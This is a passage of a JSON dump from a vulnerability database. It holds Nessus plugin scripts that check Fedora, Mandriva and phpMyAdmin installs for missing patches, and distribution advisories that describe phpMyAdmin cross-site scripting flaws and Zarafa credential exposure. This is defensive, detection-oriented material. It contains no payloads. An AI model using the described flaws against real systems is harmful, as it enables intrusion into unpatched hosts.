Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Fedora 19 : phpMyAdmin-4.2.9.1-1.fc19 (2014-11983)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11983.NASL", "href": "https://www.tenable.com/plugins/nessus/78374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11983.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78374);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"FEDORA\", value:\"2014-11983\");\n\n script_name(english:\"Fedora 19 : phpMyAdmin-4.2.9.1-1.fc19 (2014-11983)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table\n structure pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148664\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140407.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4844dde4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"phpMyAdmin-4.2.9.1-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:23", "description": "A vulnerability has been discovered and corrected in phpmyadmin :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages (CVE-2014-7217).\n\nThis upgrade provides the latest phpmyadmin version (4.2.9.1) to address this vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", 
"title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:194)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-194.NASL", "href": "https://www.tenable.com/plugins/nessus/78061", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:194. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78061);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"MDVSA\", value:\"2014:194\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:194)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in phpmyadmin :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table\nsearch and table structure pages (CVE-2014-7217).\n\nThis upgrade provides the latest phpmyadmin version (4.2.9.1) to\naddress this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.9.1-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:22", "description": 
"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table structure pages\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Fedora 20 : phpMyAdmin-4.2.9.1-1.fc20 (2014-12085)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-12085.NASL", "href": "https://www.tenable.com/plugins/nessus/78057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12085.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78057);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"FEDORA\", value:\"2014-12085\");\n\n script_name(english:\"Fedora 20 : phpMyAdmin-4.2.9.1-1.fc20 (2014-12085)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table\n structure pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148664\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9de4697a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"phpMyAdmin-4.2.9.1-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:05:40", "description": "According to its self-reported version number, the phpMyAdmin install hosted on the remote web server is 4.1.x prior to 4.1.14.1 or 4.2.x prior to 4.2.4. It is, therefore, affected by multiple cross-site scripting vulnerabilities.\n\nThe flaws exist due to user input not being validated in a crafted table name after a hide or unhide action. 
This could allow a remote attacker, with a specially crafted request, to execute arbitrary script code within the browser / server trust relationship.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-27T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.1.x < 4.1.14.1 / 4.2.x < 4.2.4 Navigation Hiding Items Multiple XSS (PMASA-2014-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_3.NASL", "href": "https://www.tenable.com/plugins/nessus/76278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76278);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-4349\");\n script_bugtraq_id(68205);\n\n script_name(english:\"phpMyAdmin 4.1.x < 4.1.14.1 / 4.2.x < 4.2.4 Navigation Hiding Items Multiple XSS (PMASA-2014-3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple cross-site scripting vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin install\nhosted on the remote web server is 4.1.x prior to 4.1.14.1 or 4.2.x\nprior to 4.2.4. It is, therefore, affected by multiple cross-site\nscripting vulnerabilities.\n\nThe flaws exist due to user input not being validated in a crafted\ntable name after a hide or unhide action. 
This could allow a remote\nattacker, with a specially crafted request, to execute arbitrary\nscript code within the browser / server trust relationship.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/d4f754c937f9e2c0beadff5b2e38215dde1d6a79\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?536b65d4\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/daa98d0c7ed24b529dc5df0d5905873acd0b00be\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddc55164\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.1.14.1 / 4.2.4 or later, or apply the\npatch from the referenced link.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\n\nversion = install['ver'];\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (version =~ \"^4(\\.\\d+)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\n\n# Affected version\n# 4.1.x < 4.1.14.1\n# 4.2.x < 4.2.4\n\nvuln = 0;\n\nre = make_array(-2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\");\n\nif (version =~ \"^4\\.1\\.\")\n{\n fixed_ver = '4.1.14.1';\n\n if (\n ver_compare(ver:version, fix:\"4.1.0\", regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n ) vuln++;\n}\nif (version =~ \"^4\\.2\\.\")\n{\n fixed_ver = '4.2.4';\n\n if (\n ver_compare(ver:version, fix:\"4.2.0\", regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n ) vuln++;\n}\n\nif (vuln)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", 
"description": "Updated zarafa packages fix security vulnerabilities: Robert Scheck reported that Zarafa's WebAccess stored session information, including login credentials, on-disk in PHP session files. This session file would contain a user's username and password to the Zarafa IMAP server (CVE-2014-0103). Robert Scheck discovered that the Zarafa Collaboration Platform has multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448, CVE-2014-5449, CVE-2014-5450). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2014-09-22T08:31:24", "type": "mageia", "title": "Updated zarafa packages fix multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2014-09-22T08:31:24", "id": "MGASA-2014-0380", "href": "https://advisories.mageia.org/MGASA-2014-0380.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "In phpMyAdmin before 4.1.14.2, when navigating into the database triggers page, it is possible to trigger an XSS with a crafted trigger name 
(CVE-2014-4955). In phpMyAdmin before 4.1.14.2, with a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page (CVE-2014-4986). In phpMyAdmin before 4.1.14.2, an unprivileged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them (CVE-2014-4987). \n", "cvss3": {}, "published": "2014-08-05T20:08:48", "type": "mageia", "title": "Updated phpmyadmin package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2014-08-05T20:08:48", "id": "MGASA-2014-0310", "href": "https://advisories.mageia.org/MGASA-2014-0310.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated phpmyadmin package fixes security vulnerabilities: In phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in browse table, ENUM editor, monitor, query charts and table relations pages (CVE-2014-5273). In phpMyAdmin before 4.1.14.3, with a crafted view name it is possible to trigger an XSS when dropping the view in view operation page (CVE-2014-5274). 
\n", "cvss3": {}, "published": "2014-08-21T09:36:13", "type": "mageia", "title": "Updated phpmyadmin package fixes XSS vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-21T09:36:13", "id": "MGASA-2014-0344", "href": "https://advisories.mageia.org/MGASA-2014-0344.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated phpmyadmin package fixes security vulnerability: In phpMyAdmin before 4.1.14.4, by deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature (CVE-2014-6300). 
\n", "cvss3": {}, "published": "2014-09-22T08:31:24", "type": "mageia", "title": "Updated phpmyadmin package fix CVE-2014-6300\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-22T08:31:24", "id": "MGASA-2014-0383", "href": "https://advisories.mageia.org/MGASA-2014-0383.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "In phpMyAdmin before 4.1.14.4, with a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages (CVE-2014-7217). 
\n", "cvss3": {}, "published": "2014-10-07T09:22:51", "type": "mageia", "title": "Updated phpmyadmin package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-07T09:22:51", "id": "MGASA-2014-0402", "href": "https://advisories.mageia.org/MGASA-2014-0402.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated phpmyadmin packages fix security vulnerability: In phpMyAdmin before 4.1.14, it is possible to trigger an XSS when hiding or unhiding a crafted table name in the navigation, due to unescaped HTML output in the navigation items hiding feature. Note that this vulnerability can only be triggered by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form (CVE-2014-4349). 
\n", "cvss3": {}, "published": "2014-06-27T15:03:09", "type": "mageia", "title": "Updated phpmyadmin packages fix CVE-2014-4349\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-27T15:03:09", "id": "MGASA-2014-0275", "href": "https://advisories.mageia.org/MGASA-2014-0275.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5450", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:182\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : zarafa\r\n Date : September 24, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated zarafa packages fix security vulnerabilities:\r\n \r\n Robert Scheck reported that Zarafa's WebAccess stored session\r\n information, including login credentials, on-disk in PHP session\r\n files. 
